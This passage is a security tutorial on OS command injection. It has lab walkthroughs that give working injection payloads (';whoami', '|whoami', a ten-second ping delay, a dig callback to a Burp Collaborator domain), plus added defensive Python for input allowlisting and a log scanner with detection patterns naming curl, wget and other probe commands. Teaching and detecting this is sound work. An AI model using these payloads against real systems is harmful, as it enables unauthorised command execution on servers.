II. Analysis and exploitation of OS command injection vulnerabilities (continued)
3. Common OS command injection vulnerabilities
Consider a shopping website that includes a function to check how many units of a product are left in stock, reached through the following URL:
https://insecure-website.com/stockStatus?productID=381&storeID=29
The website passes the productID and storeID values into a shell command as follows:
stockreport.pl 381 29
The command's output is returned in the user interface. Both parameters, productID and storeID, can be changed by the user, so this mechanism can be abused for a command injection attack. An attacker can pass the value & echo aiwefwlguh & as the productID parameter, and the shell command becomes:
stockreport.pl & echo aiwefwlguh & 29
As discussed above for the & character, the shell now treats this as three commands that run at the same time: stockreport.pl, echo aiwefwlguh and 29. The interface then returns the following result:
Error - productID was not provided
aiwefwlguh
29: command not found
In the first line, the stockreport.pl command failed because it received no parameters; the second command executed successfully; the third command, 29, was not found, producing an error. Only the result of the second command matters: the returned string aiwefwlguh shows that the echo command executed, which confirms that the command injection vulnerability is exploitable.
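The following Python is an added example and not code from the original article or from the website it describes; it contrasts the vulnerable shape just discussed (both request values pasted into one string that a shell parses) with the hardened shape (each value checked against the only format it can legally have, then passed as its own argv element with no shell in the path). The script path /opt/app/stockreport.pl, the validator names and the JSON-echoing child process are assumptions for this example.

```python
import json
import re
import subprocess
import sys

# Assumed location of the inventory script; a placeholder for this example.
STOCK_SCRIPT = "/opt/app/stockreport.pl"

# Product and store identifiers are only ever short decimal integers, so
# anything else (spaces, '&', ';', '|', newlines, ...) is refused before a
# command is built at all.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def vulnerable_command(product_id: str, store_id: str) -> str:
    """The shape from the text: raw request values pasted into one string.

    If this string is handed to a shell (shell=True, os.system, Perl
    backticks, ...) the shell, not the script, decides where the command
    ends, so metacharacters in either value start new commands.
    """
    return f"{STOCK_SCRIPT} {product_id} {store_id}"


def validate_id(name: str, value: str) -> str:
    """Allowlist check: accept a run of digits, reject everything else."""
    if not NUMERIC_ID.fullmatch(value):
        raise ValueError(f"{name} must be a decimal integer, got {value!r}")
    return value


def is_accepted(value: str) -> bool:
    """True when the allowlist would let this value reach the command."""
    try:
        validate_id("id", value)
    except ValueError:
        return False
    return True


def safe_argv(product_id: str, store_id: str) -> list[str]:
    """Hardened shape: validated values become separate argv entries.

    Executed with shell=False, the list is never parsed by a shell, so a
    value can only ever be one literal argument of the script.
    """
    return [
        STOCK_SCRIPT,
        validate_id("productID", product_id),
        validate_id("storeID", store_id),
    ]


def run_stock_report(product_id: str, store_id: str) -> subprocess.CompletedProcess:
    """Run the report through an argument vector, with a timeout."""
    return subprocess.run(
        safe_argv(product_id, store_id),
        shell=False,
        capture_output=True,
        text=True,
        timeout=10,
    )


def argv_seen_by_child(values: list[str]) -> list[str]:
    """Observe what a child receives when no shell is in the path.

    A small Python child prints its own argv as JSON; a value such as
    '& echo aiwefwlguh &' comes back as one literal string instead of
    being split into three commands.
    """
    child = [sys.executable, "-c",
             "import json, sys; print(json.dumps(sys.argv[1:]))", *values]
    done = subprocess.run(child, capture_output=True, text=True, check=True)
    return json.loads(done.stdout)


if __name__ == "__main__":
    payload = "& echo aiwefwlguh &"          # the probe value from the text
    print("shell string:", vulnerable_command(payload, "29"))
    print("allowlist accepts payload:", is_accepted(payload))
    print("child argv with shell=False:", argv_seen_by_child([payload, "29"]))
```

The two defences are independent and both are worth having: the allowlist stops the bad value at the edge of the application, and the argument vector means that even a value which slips past validation can never be interpreted as shell syntax.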
Analyze lab OS command injection, simple case
Description: The website contains a command injection vulnerability in the function that checks the remaining quantity of products. The system uses the productId and storeId parameters from the user's request in a shell command executed at the server and returns the result. To solve the lab, we need to execute the whoami command, which returns the name of the current user on the server.
In the product detail view, the Check stock function allows users to check how many units are left in stock.
Observe the request in Burp Suite:
The request uses the POST method and passes two parameters, productId and storeId, to the system. The user can set these two values to anything.
Because the system passes these parameter values directly to the shell command, we can change a value to execute arbitrary shell commands, for example the id command, which shows the user ID (uid), the group ID (gid) and the groups the user belongs to.
Now, when the system executes the shell command to get the stock figure, it also executes the id command and returns the result uid=12001(peter-CUXeyH) gid=12001(peter) groups=12001(peter):
Some payloads we can use:
- Payload 1: use ; to terminate the command, then execute whoami: productId=1&storeId=1;whoami
- Payload 2: end the command with |: productId=1&storeId=1|whoami
- Payload 3: break the command with %0d:
There are many other payloads for you to learn!
4. Blind OS command injection vulnerability
While studying the functions that can lead to OS command injection above, we saw that some return the command's output in the browser, while others only execute the command without returning its output, showing the result only indirectly, for example through data that other commands log. OS command injection vulnerabilities behave the same way: the website will not always return the output of the shell command we inject as clearly as in the case above. That does not mean the vulnerability is absent. This type of vulnerability is called a blind OS command injection vulnerability.
Consider a website with a function that lets users fill in personal information when placing an order; the user enters an email address and a confirmation of the order is sent to that address. To do this, the website runs a mail program that takes the user's email address as input, as follows:
mail -s "Content of Email" -aFrom:peter@normal-user.net notification@vulnerable-website.com
In this case the output of any shell command injected by the user will of course not be returned. So the question is: how do we test for this kind of "blind" vulnerability, and what signs help us identify it?
5. Check for Blind OS command injection vulnerabilities with time delays
We can test for this vulnerability by injecting a command that makes the system's response take a measurable amount of time. By observing the application's response time, we can confirm that the command was executed. The ping command is a good choice here:
& ping -c 10 127.0.0.1 &
The command above causes the application to ping localhost, which takes about ten seconds.
Lab analysis Blind OS command injection with time delays
Description: The website contains a blind command injection vulnerability in the user feedback function, and the command's output is not displayed. The system executes shell commands at the server using user-supplied parameters. To solve the lab, we need to exploit the vulnerability to make the system delay its response by ten seconds.
The Submit feedback function allows users to enter name, email, subject and message. These values are passed to the system via the POST method:
To check whether the system has a command injection vulnerability, we can use the dig command to perform a DNS lookup and watch for the resulting query from the server. Several domains can be used for this free of charge. Here I use Burp Collaborator, with the domain name 8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net, and add ;dig+8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net after each parameter to check it:
The email parameter produces a successful DNS lookup, so the email value is used in the shell command at the server. We can then use the ping command to make the system delay for ten seconds:
Payload: email=hacker%40gmail.com||ping+-c+10+127.0.0.1||
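From the defender's side, the probes shown in both labs (the ; and | payloads of the simple case, and the dig lookup and ten-second ping of the blind case) leave three kinds of trace: shell metacharacters in a parameter, a request that takes as long as the injected delay, and a DNS name belonging to an out-of-band testing service. The following Python is an added example, not code from the original article or from Burp Suite, that looks for all three in an application request log. The JSON-lines log format, the sample events, the EXAMPLE-ID callback label and the 5000 ms threshold are constructed for this example.

```python
import json
import re
from urllib.parse import unquote_plus

# Sequences a shell uses to end one command and begin another.
SHELL_METACHARS = re.compile(r"[;&|`\n\r]|\$\(")
# Command names typical of probes for this bug class: identity checks,
# time delays and DNS lookups used for out-of-band confirmation.
PROBE_COMMANDS = re.compile(
    r"(?<![A-Za-z0-9_])(whoami|id|ping|sleep|dig|nslookup|curl|wget)(?![A-Za-z0-9_])"
)
# Callback domains of common out-of-band testing services.
OOB_DOMAINS = re.compile(r"burpcollaborator\.net|oastify\.com|interact\.sh", re.I)
# A response this slow, together with a delay command, points at a time probe.
DELAY_THRESHOLD_MS = 5000

# Constructed application request log (JSON lines): one event per request with
# the raw, still form-encoded parameters and the server-side handling time.
SAMPLE_LOG = [
    '{"src": "198.51.100.7", "path": "/product/stock", "params": {"productId": "381", "storeId": "29"}, "duration_ms": 118}',
    '{"src": "203.0.113.5", "path": "/product/stock", "params": {"productId": "1", "storeId": "1;whoami"}, "duration_ms": 131}',
    '{"src": "203.0.113.5", "path": "/feedback/submit", "params": {"name": "x", "email": "hacker%40gmail.com||ping+-c+10+127.0.0.1||", "subject": "hi", "message": "hello"}, "duration_ms": 10042}',
    '{"src": "203.0.113.5", "path": "/feedback/submit", "params": {"name": "x", "email": "test%40example.com;dig+EXAMPLE-ID.burpcollaborator.net", "subject": "hi", "message": "hello"}, "duration_ms": 205}',
]


def decode_value(raw: str) -> str:
    """Undo form encoding so ';', '|', '%0d' and '+' look as the shell saw them."""
    return unquote_plus(raw)


def analyze_event(event: dict) -> list[str]:
    """Return human-readable findings for one request, empty if it looks clean."""
    findings = []
    duration = event.get("duration_ms", 0)
    for name, raw in event.get("params", {}).items():
        value = decode_value(raw)
        has_meta = SHELL_METACHARS.search(value) is not None
        cmds = PROBE_COMMANDS.findall(value)
        if has_meta:
            findings.append(f"{name}: shell metacharacter in {value!r}")
        if has_meta and cmds:
            findings.append(f"{name}: probe command {cmds[0]!r} follows a metacharacter")
        if OOB_DOMAINS.search(value):
            findings.append(f"{name}: out-of-band callback domain in value")
        if duration >= DELAY_THRESHOLD_MS and any(c in ("ping", "sleep") for c in cmds):
            findings.append(f"{name}: {duration} ms response alongside delay command {cmds[0]!r}")
    return findings


def scan_log(lines: list[str]) -> list[dict]:
    """Run analyze_event over JSON-lines input and keep only flagged requests."""
    hits = []
    for line in lines:
        event = json.loads(line)
        findings = analyze_event(event)
        if findings:
            hits.append({"src": event["src"], "path": event["path"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["src"], hit["path"])
        for finding in hit["findings"]:
            print("   ", finding)
```

Decoding before matching matters: the blind-case payload arrives as ping+-c+10 and a line-break separator as %0d, neither of which a metacharacter regex would see in the raw form. The timing rule is deliberately tied to the presence of a delay command, since slow requests on their own are too common to alert on.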